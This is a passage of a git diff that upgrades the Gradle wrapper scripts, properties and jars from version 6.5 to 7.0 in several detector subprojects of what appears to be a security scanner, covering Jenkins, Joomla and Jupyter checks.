/c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/jenkins/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/jenkins/gradlew b/google/detectors/exposedui/jenkins/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/jenkins/gradlew +++ b/google/detectors/exposedui/jenkins/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/jenkins/gradlew.bat b/google/detectors/exposedui/jenkins/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/jenkins/gradlew.bat +++ b/google/detectors/exposedui/jenkins/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/joomla_install/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/jupyter/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/jupyter/gradlew b/google/detectors/exposedui/jupyter/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/jupyter/gradlew +++ b/google/detectors/exposedui/jupyter/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/jupyter/gradlew.bat b/google/detectors/exposedui/jupyter/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/google/detectors/exposedui/jupyter/gradlew.bat +++ b/google/detectors/exposedui/jupyter/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute 